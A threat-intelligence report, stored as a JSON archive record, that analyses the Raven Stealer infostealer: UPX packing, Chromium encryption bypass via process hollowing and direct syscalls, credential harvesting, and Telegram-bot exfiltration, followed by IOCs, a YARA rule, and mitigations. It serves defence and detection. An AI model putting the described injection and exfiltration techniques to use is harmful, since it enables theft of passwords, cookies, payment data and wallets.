{ "id": "90e134a0-0048-48ef-bad9-8aed0520a017", "created_at": "2026-04-06T00:07:38.762038Z", "updated_at": "2026-04-10T13:11:31.233719Z", "deleted_at": null, "sha1_hash": "10b597cb57adeef2983f1b087af23b738d258268", "title": "RAVEN STEALER UNMASKED: Telegram-Based Data Exfiltration. - CYFIRMA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2848047, "plain_text": "RAVEN STEALER UNMASKED: Telegram-Based Data\r\nExfiltration. - CYFIRMA\r\nArchived: 2026-04-05 21:31:01 UTC\r\nPublished On : 2025-07-26\r\nEXECUTIVE SUMMARY\r\nRaven Stealer is a modern, lightweight, information-stealing malware developed primarily in Delphi and C++,\r\ndesigned to extract sensitive data from victim machines with minimal user interaction and high operational stealth.\r\nPromoted under the guise of “educational use,” Raven Stealer demonstrates functionality consistent with malicious\r\nintent, including credential theft, browser data harvesting, and real-time data exfiltration via Telegram bot\r\nintegration.\r\nThe stealer specifically targets Chromium-based browsers (such as Chrome and Edge), extracting passwords,\r\ncookies, saving payment details, and autofill information. Its use of a modular architecture and a built-in resource\r\neditor allows attackers to embed configuration details (like Telegram bot tokens and chat IDs) directly into the\r\ncompiled payload. This structure streamlines the deployment process, enabling even low-skill threat actors to launch\r\ncredential-harvesting campaigns.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 1 of 17\n\nUnlike Python-based stealers, Raven’s compiled binaries are packed using UPX, reducing their size and improving\r\nevasion against static detection mechanisms. The malware executes in a fully hidden state, leaving no visible traces\r\nor UI elements during runtime, which significantly lowers the chance of user detection.\r\nRaven Stealer is actively distributed through GitHub repositories and promoted via the Telegram channel. This\r\nchannel functions as both a development log and distribution platform, regularly sharing builder updates, guides,\r\nand promotional content for the stealer. The use of Telegram for C2-like behavior, paired with a clean user interface\r\nand dynamic module support, positions Raven Stealer as a commercially attractive tool within the commodity\r\nmalware ecosystem.\r\nINTRODUCTION\r\nThe rise of modular, easy-to-deploy information stealers reflects a growing trend in the cybercriminal ecosystem,\r\nlowering the technical barrier to entry for threat actors while increasing the scale and automation of credential theft\r\noperations. Raven Stealer is one such tool: a Delphi/C++-based stealer that offers robust credential extraction,\r\nstealth execution, and real-time exfiltration via Telegram.\r\nBuilt with a focus on usability and evasion, Raven enables even novice attackers to deploy credential theft\r\ncampaigns with minimal setup.\r\nRaven Stealer is actively maintained and distributed through GitHub and a dedicated Telegram channel, ZeroTrace,\r\nwhich functions as the main communication and distribution hub for the tool. Notably, the same threat actor or\r\ngroup associated with Raven is also linked to the release of Octalyn Stealer, a separate but similarly featured stealer,\r\nsuggesting an evolving portfolio of malware under a single development entity. This signals a broader intent to\r\ndominate the low-tier malware-as-a-service (MaaS) space through continuous iteration and brand diversification.\r\nThis report provides a technical analysis of Raven Stealer’s capabilities, explores its external distribution\r\ninfrastructure, maps observed behaviors to the MITRE ATT\u0026CK framework, and outlines strategic\r\nrecommendations for detection and defense.\r\nSTATIC ANALYSIS\r\nRavenStealer.exe\r\nv8Axs07p.3mf.exe\r\n6237a776e38b6a60229ac12fc6b21fb3\r\nf74ec376aa22ce0b0d55023d8877dc72\r\nTarget Technology Windows OS\r\nLanguage RavenStealer.exe – Delphi v8Axs07p.3mf.exe – C++\r\nThe builder, developed using Delphi, features a graphical user interface (GUI) that enables the user to generate a\r\ncustomized stub payload either in its original form or packed with UPX. The generated payload is assigned a\r\nrandomly generated twelve-character name. By providing a Telegram bot token and chat ID, the user can configure\r\nthe payload to communicate via Telegram. The embedded stub payload, written in C++, is integrated within the\r\nbuilder.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 2 of 17\n\nAnalysis of v8Axs07p.3mf.exe\r\nThe entropy value of v8Axs07p.3mf.exe exceeds 7, indicating that the file is likely packed using the UPX Cryptor.\r\nSuch packing techniques are commonly employed to obstruct reverse engineering and complicate static analysis.\r\nThe file v8Axs07p.3mf.exe, initially exhibiting high entropy, was successfully unpacked using the UPX utility. This\r\nconfirmed the use of UPX packing and enabled further static and dynamic analysis.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 3 of 17\n\nThe malware stores the Telegram chat_id and bot token in plain text within embedded resources, specifically under\r\nresource IDs 102 and 103. It also includes a PAYLOAD_DLL as an embedded resource, which has a high entropy\r\nvalue of 8, indicating that the DLL is obfuscated. This payload is likely intended for injection into a legitimate\r\nprocess.\r\nSeveral imported functions—such as Process32NextW, GetCurrentProcessId, and CreateProcessW—along with the\r\nunusually large size of certain resource sections, indicate that the malware is designed to perform DLL injection into\r\nlegitimate processes.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 4 of 17\n\nAt its main entry point, the malware hides its console window by calling the Windows API ShowWindow with the\r\nSW_HIDE flag. To further enhance stealth, it sets the extended window style 0x80 (WS_EX_TOOLWINDOW),\r\nwhich removes the window from the taskbar and Alt+Tab view, effectively preventing any visible popup and making\r\nthe process less noticeable to the user.\r\nExtracting Bot Token and ChatID from Embedded Resources:\r\nThe malware leverages Windows API functions FindResourceW and LoadResource, using specific resource IDs to\r\nextract the embedded Telegram bot token and chat_id. This data is then loaded into memory and used for command-and-control (C2) communication during execution.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 5 of 17\n\nDecrypt Chromium-based browsers’ passwords:\r\nThis malware bypasses Chromium’s App-Bound Encryption (ABE) using in-memory techniques. It starts a\r\nlegitimate browser process in a suspended state, then uses Direct Syscall-based Reflective Process Hollowing to\r\ninject its payload. By taking over the browser’s security context, it can decrypt and steal sensitive data like\r\npasswords, cookies, payment info, without touching disk or triggering user-land hooks.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 6 of 17\n\nLaunches the browser in a suspended state\r\nThe malware relaunches the browser with arguments like –headless, –disable-gpu, and –no-sandbox for stealth,\r\nstability, and easier exploitation.\r\n–headless: Runs the browser without a visible UI. This avoids user suspicion and saves system resources.\r\n–disable-gpu / –disable-software-rasterizer: Prevents GPU-related issues in headless mode, making the browser run\r\nmore reliably in a virtualized or background environment.\r\n–no-sandbox: Disables Chromium’s built-in sandbox, lowering security barriers and making injection and memory\r\nmanipulation easier.\r\nIn-Memory DLL Injection into Chromium\r\nThe malware carries its main payload DLL as a ChaCha20-encrypted resource embedded within itself. This payload\r\nis decrypted in memory at runtime, never touching disk, and is injected into a web browser process. Instead of\r\ncompromising an existing process, the malware creates a new instance of the browser in a suspended state using\r\nCreateProcessW. This untouched, suspended process becomes the target for reflective process hollowing, allowing\r\nthe injected code to run under the browser’s identity while avoiding common detection mechanisms.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 7 of 17\n\nReflective Injection via Syscalls:\r\nBy leveraging direct syscall injection, the malware bypasses antivirus detection and targets processes like\r\nchrome.exe and brave.exe to extract sensitive data. It allocates memory in the remote process using\r\nNtAllocateVirtualMemory, writes the decrypted payload into that space with NtWriteVirtualMemory, and sets the\r\nmemory region to executable using NtProtectVirtualMemory. To enable communication, it creates a named pipe and\r\nwrites its identifier directly into the target process’s memory.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 8 of 17\n\nEnumeration and Extraction of Stored Browser Credentials\r\nThe malware performs system-wide enumeration to locate stored credentials on the infected machine. It specifically\r\nsearches for saved browser data, including passwords and authentication cookies, from applications such as Chrome,\r\nBrave, and other Chromium-based browsers.\r\nAfter extracting the data, the malware collects information from various sources such as cryptocurrency wallets,\r\nsaved passwords, browser cookies, gaming platforms, VPN clients, and instant messaging services. It then stores the\r\nstolen data in the user’s AppData directory in a well-organized folder structure for later exfiltration.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 9 of 17\n\nDYNAMIC ANALYSIS:\r\nStorage of Exfiltrated Data\r\nThe malware executes a PowerShell command to create an archive of the exfiltrated data, packaging files from the\r\nAppData directory into a compressed file stored in the Temp folder.\r\nAll stolen credentials and system information are stored in an organized directory structure within the %Local%\\\\\r\nRavenStealer folder.\r\nSubfolders include categories like Chrome, Crypto wallets, Edge, and others. Individual files, such as\r\nscreenshot.png, further structure the harvested data, making it easy for the attacker to parse and review once\r\nexfiltrated through the Telegram bot.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 10 of 17\n\nUpon completion of data collection, the contents of the folder are compressed into a ZIP archive and stored in the\r\nsystem’s temporary directory. The archive filename includes a suffix containing the current user’s username.\r\nData Exfiltration\r\nThe Network traffic analysis reveals that the malware uses curl.exe with specific arguments to upload the exfiltrated\r\nZIP file via the Telegram API. It leverages the /sendDocument method to directly send the stolen credentials to the\r\nattacker’s Telegram bot, using the embedded CHAT_ID and BOT TOKEN.\r\nUpon successfully establishing a connection with the attacker-controlled Telegram bot, Raven Stealer transmits the\r\nname of a uniquely identifiable ZIP archive to indicate successful infection and data exfiltration. The archive name\r\ntypically incorporates the victim’s system username, appended with a fixed suffix such as RavenStealer.zip. This\r\nconsistent naming convention allows the threat actor to systematically organize, monitor, and correlate exfiltrated\r\ndata with individual victims across numerous compromised systems.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 11 of 17\n\nUpon downloading and extracting the exfiltrated ZIP archive, the contents are presented in a structured and\r\nsystematic format, enabling efficient access and analysis by the threat actor. The archive typically includes several\r\ndirectories and files, each representing specific categories of compromised data.\r\nFolders:\r\nChrome \u003e Default: Contains browser-specific data files such as cookies.txt, password.txt, and payment.txt,\r\nextracted from the default user profile of Google Chrome.\r\nEdge \u003e Default: Includes cookies.txt, password.txt, and payment.txt, retrieved from the default user profile of\r\nMicrosoft Edge.\r\nCrypto Wallets: Stores information extracted from browser-based or locally installed cryptocurrency wallets,\r\nincluding wallet addresses, private keys, and configuration files.\r\nFiles:\r\ncookies.txt: A compiled collection of cookies gathered from multiple browsers, typically used for session\r\nhijacking purposes.\r\npasswords.txt: Includes decrypted or plaintext credentials saved within web browsers.\r\npayment.txt: Extracted payment-related data, such as saved credit or debit card details and associated billing\r\ninformation stored in the browser.\r\nscreenshot.png: A desktop screenshot captured at the time of execution, providing the attacker with visual\r\ncontext of the compromised environment.\r\nThis structured layout allows the threat actor to efficiently locate, interpret, and exploit a wide range of sensitive\r\ninformation. It reflects Raven Stealer’s comprehensive data collection capabilities, spanning personal details, login\r\ncredentials, financial information, and visual evidence of system activity.\r\nEXTERNAL THREAT LANDSCAPE MANAGEMENT\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 12 of 17\n\nRaven Stealer is attributed to a threat actor or developer group operating under the name ZeroTrace Team, which\r\nmaintains an active presence across both GitHub and Telegram. The stealer was first publicly uploaded to GitHub on\r\nJuly 15, 2025, and includes numerous indicators pointing to a consistent development identity.\r\nNotably, internal file paths recovered from the repository’s build artifacts, such as the ‘.identcache’ file, include\r\nreferences to a development environment that reveal a local Windows machine setup, indicating a specific user\r\naccount was involved.\r\nWithin the source code itself, specifically in the RavenStealer.cpp file, a hardcoded author declaration attributes the\r\nwork to the ZeroTrace Team. The content includes a name and a Hotmail email address, suggesting deliberate\r\nbranding and author tagging consistent with attempts to gain visibility within illicit developer communities.\r\nTheir Telegram channel frequently shares builder updates, usage tutorials, and stealer variants, and serves as a\r\ncontact point for threat actors and users. Telegram’s anonymity, wide reach, and ease of bot integration make it a\r\npopular choice for real-time data exfiltration, especially for credential logs and screenshots.\r\nThe ZeroTrace Telegram channel was created on April 30, 2025, initially promoting a custom crypter tool branded\r\nas “ZeroTrace”, and has since expanded to publish and promote multiple stealer variants, including Raven Stealer\r\nand Octalyn Stealer, often hosted and shared via open-source repositories.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 13 of 17\n\nThe stealer’s builder tool allows threat actors to directly embed Telegram Bot Tokens and Chat IDs into the payload,\r\nenabling seamless delivery of stolen data to private Telegram chats. Through this mechanism, Telegram acts as both\r\nthe communication layer and the exfiltration endpoint, replacing traditional C2 servers.\r\nAdditionally, the same channel is used to promote another malware strain named Octalyn Stealer, which shares\r\nstructural and operational similarities with Raven Stealer. The use of a single Telegram hub for both tools suggests\r\nthat ZeroTrace Team actively maintains multiple infostealer variants, likely to diversify branding, bypass signature-based detection, and expand reach across different threat actor groups.\r\nTogether, these infrastructure elements, GitHub repositories, Telegram-based distribution and exfiltration, and direct\r\ndeveloper attribution provide a clear external footprint of the Raven Stealer ecosystem.\r\nCONCLUSION\r\nRaven Stealer incorporates advanced stealth capabilities by executing silently without displaying a console or\r\ncommand prompt, thereby significantly reducing the risk of user detection. It facilitates the extraction of sensitive\r\ndata, including browser credentials, cookies, payment information, and autofill details from Chromium-based\r\nbrowsers, while also extending its targeting to include gaming services, VPN clients, and cryptocurrency wallets. Its\r\nmodular design, embedded configuration options, and UPX packing enhance its ability to evade static detection and\r\nsimplify deployment, rendering it accessible even to actors with limited technical expertise. Distributed via GitHub\r\nand promoted through Telegram, Raven Stealer employs encrypted exfiltration and seamless integration with\r\nTelegram bots for real-time data transmission and campaign management. These characteristics reflect its ongoing\r\ndevelopment and reinforce its potential as a substantial threat when utilized beyond legitimate research or controlled\r\nenvironments.\r\nMITRE ATTACK FRAMEWORK\r\nTactic ID Technique Name\r\nExecution T1129 Shared Modules\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 14 of 17\n\nPersistence\r\nT1542 Pre-OS Boot\r\nT1542.003 Bootkit\r\nDefense Evasion\r\nT1027 Obfuscated Files or Information\r\nT1027.002 Obfuscated Files or Information: Software Packing\r\nT1027.005 Indicator Removal from Tools\r\nT1497 Virtualization/Sandbox Evasion\r\nT1542 Pre-OS Boot\r\nT1542.003 Bootkit\r\nT1564 Hide Artifacts\r\n  T1564.003 Hide Artifacts: Hidden Window\r\n \r\nDiscovery\r\nT1057 Process Discovery\r\nT1082 System Information Discovery\r\nT1083 File and Directory Discovery\r\nT1497 Virtualization/Sandbox Evasion\r\nT1518 Software Discoverys\r\nT1518.001 Software Discovery: Security Software Discovery\r\nT1614 System Location Discovery\r\nCommand and control T1071 Application Layer Protocol\r\nINDICATORS OF COMPROMISE\r\nS.\r\nN\r\nindicators type context\r\n1. 2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38 EXE RavenStealer.exe\r\n2 28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55 EXE v8Axs07p.3mf.exe\r\n3. 252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9 DLL PAYLOAD_DLL.dll\r\nYARA RULES\r\nrule RavenStealer_Detection\r\n{\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 15 of 17\n\nmeta:\r\ndescription = “Detects Raven Stealer by identifying strings and embedded hash values”\r\nauthor = “Cyfirma Research”\r\ndate = “2025-07-23”\r\nmalware_family = “Raven Stealer”\r\nstrings:\r\n// IOC strings\r\n$s1 = “api.telegram.org” nocase\r\n$s2 = “RavenStealer” nocase\r\n$s3 = “passwords.txt” nocase\r\n$s4 = “payment.txt” nocase\r\n$s5 = “autofill.txt” nocase\r\n$s6 = “%Local%\\\\RavenStealer\\\\Chrome” nocase\r\n$s7 = “%Local%\\\\RavenStealer\\\\Edge” nocase\r\n$s8 = “Crypto Wallets” nocase\r\n// Known SHA-256 hashes as string literals (if embedded in binary or visible)\r\n$s9 = “2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38”\r\n$s10 = “28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55”\r\n$s11 =\r\n“252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9” condition:\r\n// Match if at least 3 of the above strings appear\r\n3 of ($s*)\r\n}\r\nRecommendations and Mitigation Strategies\r\n1. Endpoint Detection \u0026 Response (EDR) and Antivirus\r\nDeploy advanced EDR solutions capable of behavioral analysis to detect anomalous activities such as\r\ncredential harvesting, ZIP file creation in temp directories, and clipboard access.\r\nEnsure antivirus/antimalware software includes real-time protection and heuristic scanning to detect packed\r\nbinaries (e.g., UPX-packed executables).\r\nUse YARA rules to proactively hunt for known indicators associated with Raven Stealer, such as strings\r\nrelated to Telegram API usage and stolen data paths.\r\n2. Network and TLS Traffic Monitoring\r\nMonitor for outbound connections to api.telegram.org, especially from unusual processes or user directories,\r\nas this is a key C2 and exfiltration vector.\r\nDeploy TLS/SSL inspection at the gateway level where legally and technically feasible, to identify suspicious\r\nencrypted traffic patterns.\r\nImplement DNS filtering or IP-based blocking of Telegram C2 endpoints if Telegram is not required for\r\nbusiness use.\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 16 of 17\n\n3. Application Whitelisting and Execution Control\r\nRestrict execution of unauthorized binaries, especially from %Temp%, %AppData%, and %LocalAppData%\r\ndirectories.\r\nPrevent execution of binaries with high entropy or known packing signatures (e.g., UPX) in user-writable\r\ndirectories.\r\n4. Email and Download Filtering\r\nConfigure email gateways to block executable attachments, archive files containing executables, or obscure\r\nformats (e.g., .3mf.exe) used to evade detection.\r\nEmploy browser sandboxing and download monitoring to prevent unauthorized payload delivery.\r\n5. Credential Management and Browser Hardening\r\nAdvise users not to store credentials or payment information in browsers. Use enterprise password managers\r\nwith MFA support.\r\nDisable browser autofill and password saving features.\r\nRegularly clear stored browser data and cookies across endpoints.\r\n6. Telegram and GitHub Monitoring\r\nMonitor and restrict the use of unauthorized Telegram applications on corporate systems. Implement DLP\r\n(Data Loss Prevention) to identify suspicious data progress.\r\nRegularly scan GitHub and dark web platforms for new instances of Raven Stealer or associated ZeroTrace\r\nartifacts using threat intelligence feeds and code similarity detection tools.\r\n7. User Awareness and Training\r\nConduct ongoing phishing simulation campaigns and train employees on malware delivery tactics like\r\ndisguised executables (e.g., invoice.3mf.exe) and fake educational tools.\r\nWarn users about the risks of downloading software from GitHub repositories without validation.\r\n8. Incident Response Preparedness\r\nEnsure incident response plans account for credential-stealing malware and C2 over encrypted messaging\r\nplatforms.\r\nIn the event of detection, revoke all browser-stored credentials, invalidate sessions, and perform password\r\nresets.\r\nCapture forensic images and logs for deeper analysis and evidence preservation.\r\nSource: https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nhttps://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/" ], "report_names": [ "raven-stealer-unmasked-telegram-based-data-exfiltration" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434058, "ts_updated_at": 1775826691, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.pdf", "text": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.txt", "img": "https://archive.orkl.eu/10b597cb57adeef2983f1b087af23b738d258268.jpg" } }